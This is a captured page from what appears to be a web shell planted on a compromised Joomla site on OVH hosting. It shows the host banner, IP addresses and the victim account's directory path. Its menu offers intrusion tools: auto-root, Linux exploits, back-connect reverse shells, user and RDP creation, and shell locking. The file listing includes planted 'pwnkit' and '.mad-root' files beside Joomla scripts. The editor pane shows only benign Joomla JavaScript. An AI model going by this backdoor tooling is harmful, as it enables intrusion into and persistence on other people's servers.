Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
system /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
associations-edit-uncompressed...
7.09
KB
-rw----r--
associations-edit.js
2.06
KB
-rw----r--
calendar-setup-uncompressed.js
8.75
KB
-rw-r--r--
calendar-setup.js
3.02
KB
-rw-r--r--
calendar-uncompressed.js
48.02
KB
-rw-r--r--
calendar.js
29.5
KB
-rw-r--r--
caption-uncompressed.js
1.31
KB
-rw-r--r--
caption.js
491
B
-rw-r--r--
color-field-adv-init.js
654
B
-rw-r--r--
color-field-adv-init.min.js
413
B
-rw-r--r--
color-field-init.js
199
B
-rw-r--r--
color-field-init.min.js
182
B
-rw-r--r--
combobox-uncompressed.js
6.67
KB
-rw-r--r--
combobox.js
3.48
KB
-rw-r--r--
core-uncompressed.js
27.28
KB
-rw-r--r--
core.js
8.6
KB
-rw-r--r--
frontediting-uncompressed.js
6.08
KB
-rw-r--r--
frontediting.js
2.69
KB
-rw-r--r--
helpsite.js
1.04
KB
-rw-r--r--
highlighter-uncompressed.js
3.63
KB
-rw-r--r--
highlighter.js
1.55
KB
-rw-r--r--
html5fallback-uncompressed.js
13.31
KB
-rw-r--r--
html5fallback.js
5.8
KB
-rw-r--r--
jquery.Jcrop.js
73.88
KB
-rw-r--r--
jquery.Jcrop.min.js
37.48
KB
-rw-r--r--
keepalive-uncompressed.js
1.21
KB
-rw-r--r--
keepalive.js
462
B
-rw-r--r--
modal-fields-uncompressed.js
6.38
KB
-rw-r--r--
modal-fields.js
2.18
KB
-rw-r--r--
modal-uncompressed.js
13.13
KB
-rw-r--r--
modal.js
9.89
KB
-rw-r--r--
moduleorder.js
2.02
KB
-rw----r--
mootools-core-uncompressed.js
147.28
KB
-rw-r--r--
mootools-core.js
81.93
KB
-rw-r--r--
mootools-more-uncompressed.js
340.69
KB
-rw-r--r--
mootools-more.js
231.27
KB
-rw-r--r--
mootree-uncompressed.js
21.39
KB
-rw-r--r--
mootree.js
5.96
KB
-rw-r--r--
multiselect-uncompressed.js
1.33
KB
-rw-r--r--
multiselect.js
431
B
-rw-r--r--
passwordstrength.js
2.27
KB
-rw-r--r--
permissions-uncompressed.js
3.41
KB
-rw-r--r--
permissions.js
1.85
KB
-rw-r--r--
polyfill.classlist-uncompresse...
10.59
KB
-rw-r--r--
polyfill.classlist.js
4.74
KB
-rw-r--r--
polyfill.event-uncompressed.js
13.11
KB
-rw-r--r--
polyfill.event.js
6.32
KB
-rw-r--r--
polyfill.filter-uncompressed.j...
1.12
KB
-rw-r--r--
polyfill.filter.js
525
B
-rw-r--r--
polyfill.map-uncompressed.js
1.07
KB
-rw-r--r--
polyfill.map.js
509
B
-rw-r--r--
polyfill.xpath-uncompressed.js
29.32
KB
-rw-r--r--
polyfill.xpath.js
28.75
KB
-rw-r--r--
progressbar-uncompressed.js
2.78
KB
-rw-r--r--
progressbar.js
1.08
KB
-rw-r--r--
punycode-uncompressed.js
14.35
KB
-rw-r--r--
punycode.js
2.76
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
repeatable-uncompressed.js
16.89
KB
-rw-r--r--
repeatable.js
5.68
KB
-rw-r--r--
sendtestmail-uncompressed.js
1.57
KB
-rw-r--r--
sendtestmail.js
1012
B
-rw-r--r--
subform-repeatable-uncompresse...
10.04
KB
-rw----r--
subform-repeatable.js
4.22
KB
-rw----r--
switcher-uncompressed.js
2.32
KB
-rw-r--r--
switcher.js
1018
B
-rw-r--r--
tabs-state-uncompressed.js
8.83
KB
-rw-r--r--
tabs-state.js
2.5
KB
-rw-r--r--
tabs.js
2.49
KB
-rw-r--r--
validate-uncompressed.js
7.36
KB
-rw-r--r--
validate.js
3.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : frontediting-uncompressed.js
/** * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * JavaScript behavior to add front-end hover edit icons with tooltips for modules and menu items. * */ (function($) { $.fn.extend({ /** * This jQuery custom method makes the elements absolute, and with true argument moves them to end of body to avoid CSS inheritence * * @param rebase boolean * @returns {jQuery} */ jEditMakeAbsolute: function(rebase) { return this.each(function() { var el = $(this); var pos; if (rebase) { pos = el.offset(); } else { pos = el.position(); } el.css({ position: "absolute", marginLeft: 0, marginTop: 0, top: pos.top, left: pos.left, bottom: 'auto', right: 'auto' }); if (rebase) { el.detach().appendTo("body"); } }); } }); $(document).ready(function () { // Tooltip maximal dimensions for intelligent placement: var actualWidth = 200; var actualHeight = 100; // Tooltip smart tooltip placement function: var tooltipPlacer = function(tip, element) { var $element, above, below, boundBottom, boundLeft, boundRight, boundTop, elementAbove, elementBelow, elementLeft, elementRight, isWithinBounds, left, pos, right; isWithinBounds = function(elementPosition) { return boundTop < elementPosition.top && boundLeft < elementPosition.left && boundRight > (elementPosition.left + actualWidth) && boundBottom > (elementPosition.top + actualHeight); }; $element = $(element); pos = $.extend({}, $element.offset(), { width: element.offsetWidth, height: element.offsetHeight }); boundTop = $(document).scrollTop(); boundLeft = $(document).scrollLeft(); boundRight = boundLeft + $(window).width(); boundBottom = boundTop + $(window).height(); elementAbove = { top: pos.top - actualHeight, left: pos.left + pos.width / 2 - actualWidth / 2 }; elementBelow = { top: pos.top + pos.height, left: pos.left + pos.width / 2 - actualWidth / 2 }; elementLeft = { top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left - actualWidth }; elementRight = { top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left + pos.width }; above = isWithinBounds(elementAbove); below = isWithinBounds(elementBelow); left = isWithinBounds(elementLeft); right = isWithinBounds(elementRight); if (above) { return "top"; } else { if (below) { return "bottom"; } else { if (left) { return "left"; } else { if (right) { return "right"; } else { return "right"; } } } } }; // Modules edit icons: $('.jmoddiv').on({ mouseenter: function() { // Get module editing URL and tooltip for module edit: var moduleEditUrl = $(this).data('jmodediturl'); var moduleTip = $(this).data('jmodtip'); var moduleTarget = $(this).data('target'); // Stop timeout on previous tooltip and remove it: $('body>.btn.jmodedit').clearQueue().tooltip('destroy').remove(); // Add editing button with tooltip: $(this).addClass('jmodinside') .prepend('<a class="btn jmodedit" href="#" target="' + moduleTarget + '"><span class="icon-edit"></span></a>') .children(":first").attr('href', moduleEditUrl).attr('title', moduleTip) .tooltip({"container": false, html: true, placement: tooltipPlacer}) .jEditMakeAbsolute(true); $('.btn.jmodedit') .on({ mouseenter: function() { // Stop delayed removal programmed by mouseleave of .jmoddiv or of this one: $(this).clearQueue(); }, mouseleave: function() { // Delay remove editing button if not hovering it: $(this).delay(500).queue(function(next) { $(this).tooltip('destroy').remove(); next(); }); } }); }, mouseleave: function() { // Delay remove editing button if not hovering it: $('body>.btn.jmodedit').delay(500).queue(function(next) { $(this).tooltip('destroy').remove(); next(); }); } }); // Menu items edit icons: var activePopover = null; $('.jmoddiv[data-jmenuedittip] .nav li,.jmoddiv[data-jmenuedittip].nav li,.jmoddiv[data-jmenuedittip] .nav .nav-child li,.jmoddiv[data-jmenuedittip].nav .nav-child li').on({ mouseenter: function() { // Get menu ItemId from the item-nnn class of the li element of the menu: var itemids = /\bitem-(\d+)\b/.exec($(this).attr('class')); if (typeof itemids[1] == 'string') { // Find module editing URL from enclosing module: var enclosingModuleDiv = $(this).closest('.jmoddiv'); var moduleEditUrl = enclosingModuleDiv.data('jmodediturl'); // Transform module editing URL into Menu Item editing url: var menuitemEditUrl = moduleEditUrl.replace(/\/index.php\?option=com_config&controller=config.display.modules([^\d]+).+$/, '/administrator/index.php?option=com_menus&view=item&layout=edit$1' + itemids[1]); } // Get tooltip for menu items from enclosing module var menuEditTip = enclosingModuleDiv.data('jmenuedittip').replace('%s', itemids[1]); var content = $('<div><a class="btn jfedit-menu" href="#" target="_blank"><span class="icon-edit"></span></a></div>'); content.children('a.jfedit-menu').prop('href', menuitemEditUrl).prop('title', menuEditTip); if (activePopover) { $(activePopover).popover('hide'); } $(this).popover({html:true, content:content.html(), container:'body', trigger:'manual', animation:false, placement: 'bottom'}).popover('show'); activePopover = this; $('body>div.popover') .on({ mouseenter: function() { if (activePopover) { $(activePopover).clearQueue(); } }, mouseleave: function() { if (activePopover) { $(activePopover).popover('hide'); } } }) .find('a.jfedit-menu').tooltip({"container": false, html: true, placement: 'bottom'}); }, mouseleave: function() { $(this).delay(1500).queue(function(next) { $(this).popover('hide'); next() }); } }); }); })(jQuery);
Close